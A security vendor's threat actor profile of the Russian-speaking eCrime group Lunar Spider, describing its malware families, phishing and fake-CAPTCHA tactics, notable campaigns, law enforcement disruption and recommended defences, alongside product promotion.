Huntress Acquires Inside Agent: A New Era for Identity Protection
Portal LoginSupportContact
Search
Portal LoginSupportContact
Search
Get a Demo
Free Trial
HomeThreat Actors
Lunar Spider
Threat Actor Profile

Lunar Spider

Lunar Spider is a formidable Russian-speaking eCrime group, active since at least 2017, and operates as a financially motivated collective specializing in malware development and initial access brokerage. Most notably, the group created and deployed the IcedID (also known as BokBot) banking trojan, the Latrodectus downloader, and the Lotus loader family. Known for their adaptability, Lunar Spider has evolved from banking fraud operations to equipping ransomware affiliates by exploiting stolen credentials and deploying advanced post-exploitation frameworks like Brute Ratel and Cobalt Strike. Their tactics make them notorious as they swiftly progress from phishing campaigns to delivering access to high-value criminal partners, targeting vulnerable SMBs and enterprises alike.


Threat Actor Profile

Lunar Spider

Country of Origin

Lunar Spider operates out of the Russian Federation. Its known associations with other Russian-speaking threat actor groups and attribution by multiple vendors reinforce this geographic connection.

Members

The group functions as a decentralized criminal consortium. It includes developers responsible for malware, distribution affiliates utilizing phishing and malvertising, and infrastructure handlers. Exact membership size remains unknown, but it is clear that Lunar Spider relies on partners aligned under an initial access broker (IAB) service model.

Leadership

Lunar Spider’s leadership includes notable figures tied to eCrime organizations. Open-source reporting and U.S. court documentation link Vyacheslav Igorevich Penchukov ("Tank"), a leader of the Jabber Zeus gang, to IcedID development. While Penchukov’s leadership of Lunar Spider as an entity remains debated, his ties to the malware and its operations are well-established.

Lunar Spider TTPs

Tactics

Lunar Spider specializes in monetizing initial access through a blend of credential theft, malware payload delivery, and partnerships enabling ransomware affiliates. They utilize phishing, SEO poisoning, and malvertising to stage their attacks.

Techniques

  • Malvertising and SEO Poisoning – Victims are lured to fake download pages or malicious interstitials disguised as CAPTCHA screens.

  • Phishing – Malicious emails deliver obfuscated JavaScript loaders or archives containing malware payloads.

  • Custom Malware – Use of IcedID/BokBot as a multipurpose loader, Latrodectus for JavaScript delivery, and Lotus loaders for file execution via PowerShell.

 

Procedures

  • Fake CAPTCHA pages trigger PowerShell scripts to download MSI packages for malware staging.

  • DLL payloads are loaded using living-off-the-land binaries (LOLBins) like rundll32 and MSIExec to evade detection.

  • Targets’ credential stores, including LSASS processes and browsers, are scraped for sensitive information.

Want to Shut Down Threats Before They Start?

Schedule a Demo Todayright arrow

Notable Cyberattacks

  1. 2024 Fake CAPTCHA Campaign – Leveraged SEO poisoning to deploy the Lotus loader and Brute Ratel artifacts.

  2. Multi-Month Intrusion (2025) – Beginning with phishing, this campaign delivered Latrodectus and facilitated Cobalt Strike deployment for credential harvesting and exfiltration.

Law Enforcement & Arrests

Operation Endgame, conducted in May 2024, dealt a significant blow to Lunar Spider by disrupting IcedID infrastructure, seizing servers, and arresting key operators. However, Lunar Spider quickly rebounded, proving their resilience. Penchukov’s guilty plea in 2024 further highlighted leadership ties to IcedID operations.


How to Defend Against Lunar Spider

1

Browser Controls – Enforce DNS filtering and block access to third-party ad domains.

2

Email Security – Strip macros and use advanced link rewriting to mitigate phishing links.

3

PowerShell Hardening – Implement Constrained Language Mode and AMSI integration.

4

EDR and Memory Scanning – Detect and block Brute Ratel/Cobalt Strike activity.

5

Identity Security – Enforce MFA and disable legacy protocols.

Huntress solutions help protect organizations by exposing hidden persistence, identifying banking trojan activity, and mitigating Lunar Spider threats with 24/7 human-led threat hunting.

Schedule a Demo

References

Detect, Respond, Protect

See how the global Huntress SOC can augment your team
with 24/7 coverage and unmatched human expertise.
Start your free trial today.

Try Huntress for Free